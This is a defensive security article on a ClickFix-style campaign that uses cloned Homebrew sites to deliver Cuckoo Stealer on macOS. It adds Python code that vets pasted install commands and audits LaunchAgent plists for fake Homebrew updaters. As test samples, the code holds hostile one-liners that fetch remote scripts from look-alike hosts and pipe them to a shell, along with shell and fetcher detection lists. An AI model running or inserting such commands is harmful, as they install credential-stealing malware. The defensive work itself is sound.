
The campaign needs no software vulnerability and no traditional exploit chain: it turns a routine developer action, pasting an install one-liner into a terminal, into a credential-theft vector that endangers both individuals and enterprises. Mitigating it requires updated security controls around script execution and domain filtering.
Homebrew is the de facto package manager for macOS developers, and its one-line installer is a trusted entry point. Attackers have exploited that trust by registering look-alike domains (homabrews.org, raw.brewsh.cx, and others) that replicate the official brew.sh page. When a visitor copies the install command from the cloned page, a malicious "curl | bash" snippet is placed on the clipboard instead of the genuine one, so the user pastes and runs attacker-controlled code that looks legitimate. A simple copy-paste action becomes the delivery mechanism for the malware.
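The first defensive check the article implies is to look at where a copied snippet fetches its script from before running it. The following is an added example, not code from the article or from the Homebrew project: it extracts the URLs in a pasted one-liner, compares each host and path against an assumed allow-list of official Homebrew sources (the allow-list, the function names and the sample commands are assumptions for illustration), and reports whether any pipeline stage hands the download to a shell. The look-alike hosts in the samples are the ones named above.

```python
"""Added example (not part of the original article): vet a copied
"curl ... | bash" style one-liner by allow-listing where its script may be
fetched from. OFFICIAL_SOURCES and the sample commands are assumptions."""
import os
import re
import shlex
from urllib.parse import urlparse

# Assumed allow-list: host -> required path prefix ("" means any path).
OFFICIAL_SOURCES = {
    "brew.sh": "",
    "raw.githubusercontent.com": "/Homebrew/",
}
SHELLS = {"sh", "bash", "zsh"}
# A URL ends at whitespace, quotes, redirection/pipe characters or a closing paren.
URL_RE = re.compile(r"https?://[^\s'\"<>()|;&]+")


def extract_urls(command: str) -> list[str]:
    """Every http(s) URL that appears in the snippet, in order."""
    return URL_RE.findall(command)


def is_official(url: str) -> bool:
    """True only for https URLs whose host and path prefix are allow-listed."""
    parts = urlparse(url)
    if parts.scheme != "https":
        return False
    prefix = OFFICIAL_SOURCES.get((parts.hostname or "").lower())
    return prefix is not None and parts.path.startswith(prefix)


def pipes_to_shell(command: str) -> bool:
    """True if any pipeline stage after the first is a shell (optionally via sudo)."""
    for stage in command.split("|")[1:]:
        try:
            argv = shlex.split(stage)
        except ValueError:
            return True  # unbalanced quotes: refuse rather than guess
        while argv and argv[0] == "sudo":
            argv.pop(0)
        if argv and os.path.basename(argv[0]) in SHELLS:
            return True
    return False


def vet_install_command(command: str) -> dict:
    """Classify a snippet: 'block' if it fetches from a non-allow-listed source,
    or pipes something with no visible URL into a shell; otherwise 'allow'."""
    urls = extract_urls(command)
    unofficial = [u for u in urls if not is_official(u)]
    piped = pipes_to_shell(command)
    verdict = "block" if (unofficial or (not urls and piped)) else "allow"
    return {"urls": urls, "unofficial": unofficial,
            "pipes_to_shell": piped, "verdict": verdict}


# Constructed samples (assumed): the genuine installer and two look-alikes.
OFFICIAL_CMD = ('/bin/bash -c "$(curl -fsSL '
                'https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"')
FAKE_PIPED_CMD = "curl -fsSL https://raw.brewsh.cx/install.sh | bash"
FAKE_CLONE_CMD = '/bin/bash -c "$(curl -fsSL https://homabrews.org/install.sh)"'

if __name__ == "__main__":
    for cmd in (OFFICIAL_CMD, FAKE_PIPED_CMD, FAKE_CLONE_CMD):
        print(vet_install_command(cmd)["verdict"], "<-", cmd)
```

The check is deliberately strict about the path prefix as well as the host, because raw.githubusercontent.com is a legitimate host that serves anyone's repository; a raw URL under another GitHub account is treated exactly like a typosquatted domain. Plain http:// is rejected outright so a downgraded copy of the official URL cannot pass.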
The malicious loader first harvests the user's macOS password through repeated sudo-style password prompts, then uses the credential to fetch a secondary binary (brew_agent). The loader strips the quarantine attribute from that binary, so Gatekeeper never inspects it, and registers a LaunchAgent masquerading as a Homebrew updater. Because developers expect Homebrew-related background jobs, this persistence blends into normal workflows. The second-stage payload, Cuckoo Stealer, establishes an encrypted HTTPS C2 channel and exfiltrates a broad set of high-value assets: browser credentials, Keychain entries, Apple Notes, messaging tokens, VPN configs, and cryptocurrency wallet files. Its modular design also captures screenshots, muting system audio first so the capture does not alert the user.
For security teams, the campaign underscores the growing relevance of terminal phishing and script-based attacks in the macOS ecosystem. Defenders should augment web filtering to block known typosquatted domains, enforce strict allow-lists for raw-content URLs in curl commands, and monitor for anomalous LaunchAgent entries that imitate popular developer tools. Endpoint detection should flag repeated password prompts originating from unknown scripts, and user education must emphasize verifying the source URL of a command before pasting it into a terminal. Closing these gaps reduces the attack surface that this ClickFix-style campaign uses to deliver Cuckoo Stealer and similar macOS threats.
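The LaunchAgent monitoring recommended above can be started with a small audit of ~/Library/LaunchAgents. This is an added example, not code from the article or from any of the tools it names: it parses each plist with the standard library and flags jobs that carry a brew-like label or binary name but run from outside the Homebrew prefixes, jobs whose executable lives in a hidden directory, persistent jobs that run from temporary directories, and shell jobs that download remote content at login. The three sample plists, the file paths and the Homebrew prefixes are constructed assumptions for illustration; the brew_agent name comes from the article.

```python
"""Added example (not part of the original article): audit macOS LaunchAgent
plists for jobs that imitate a Homebrew updater. Sample plists are constructed."""
import os
import plistlib
from typing import Any

# Assumed: legitimate Homebrew install roots (Apple Silicon and Intel defaults).
HOMEBREW_PREFIXES = ("/opt/homebrew/", "/usr/local/")
BREW_MARKERS = ("brew",)          # "homebrew" contains "brew"
TEMP_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/", "/private/var/folders/")
SHELLS = {"sh", "bash", "zsh"}
FETCHERS = ("curl ", "wget ")


def executable_of(agent: dict[str, Any]) -> str:
    """The binary a launchd job runs: Program wins over ProgramArguments[0]."""
    if agent.get("Program"):
        return str(agent["Program"])
    args = agent.get("ProgramArguments") or []
    return str(args[0]) if args else ""


def audit_agent(agent: dict[str, Any]) -> list[str]:
    """Findings for one parsed LaunchAgent; an empty list means nothing odd."""
    findings: list[str] = []
    label = str(agent.get("Label", ""))
    exe = executable_of(agent)
    args = [str(a) for a in agent.get("ProgramArguments") or []]

    claims_brew = (any(m in label.lower() for m in BREW_MARKERS)
                   or any(m in os.path.basename(exe).lower() for m in BREW_MARKERS))
    if claims_brew and not exe.startswith(HOMEBREW_PREFIXES):
        findings.append(f"{label}: brew-like job but executable outside Homebrew prefix ({exe})")

    # Hidden directories such as ~/.something/ are a common drop location for a loader.
    if any(part.startswith(".") and part not in (".", "..") for part in exe.split("/")):
        findings.append(f"{label}: executable stored in a hidden directory ({exe})")

    if exe.startswith(TEMP_DIRS) and (agent.get("RunAtLoad") or agent.get("KeepAlive")):
        findings.append(f"{label}: persistent job runs from a temporary directory ({exe})")

    # A shell started with -c that downloads something re-fetches its payload every login.
    if os.path.basename(exe) in SHELLS and "-c" in args:
        script = " ".join(args[args.index("-c") + 1:])
        if any(f in script for f in FETCHERS):
            findings.append(f"{label}: shell job downloads and runs remote content ({script})")
    return findings


def audit_plist_bytes(data: bytes) -> list[str]:
    return audit_agent(plistlib.loads(data))


def audit_directory(path: str = os.path.expanduser("~/Library/LaunchAgents")) -> dict[str, list[str]]:
    """Audit every .plist in a LaunchAgents directory; returns {filename: findings}."""
    report: dict[str, list[str]] = {}
    if not os.path.isdir(path):
        return report
    for name in sorted(os.listdir(path)):
        if not name.endswith(".plist"):
            continue
        with open(os.path.join(path, name), "rb") as fh:
            try:
                report[name] = audit_plist_bytes(fh.read())
            except Exception as exc:  # malformed or binary-corrupt plist
                report[name] = [f"unparseable plist: {exc}"]
    return report


# Constructed sample plists (assumed paths and labels), not taken from any real host.
BENIGN_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.homebrew-update</string>
  <key>ProgramArguments</key><array><string>/opt/homebrew/bin/brew</string><string>update</string></array>
  <key>StartInterval</key><integer>86400</integer>
</dict></plist>"""

FAKE_UPDATER_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.homebrew.updater</string>
  <key>ProgramArguments</key><array><string>/Users/dev/.brew/brew_agent</string><string>--quiet</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

REMOTE_FETCH_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.sync</string>
  <key>ProgramArguments</key><array><string>/bin/sh</string><string>-c</string><string>curl -fsSL https://raw.brewsh.cx/u.sh | sh</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_AGENT), ("fake updater", FAKE_UPDATER_AGENT),
                       ("remote fetch", REMOTE_FETCH_AGENT)):
        print(name, "->", audit_plist_bytes(blob) or "clean")
    print(audit_directory())
```

Run it as a script to see the three constructed cases and then the findings for the current user's own LaunchAgents. The heuristics are intentionally narrow so a legitimate Homebrew job under /opt/homebrew or /usr/local is not reported; anything that borrows the Homebrew name while running from a home-directory dot folder, as the persistence described above does, is.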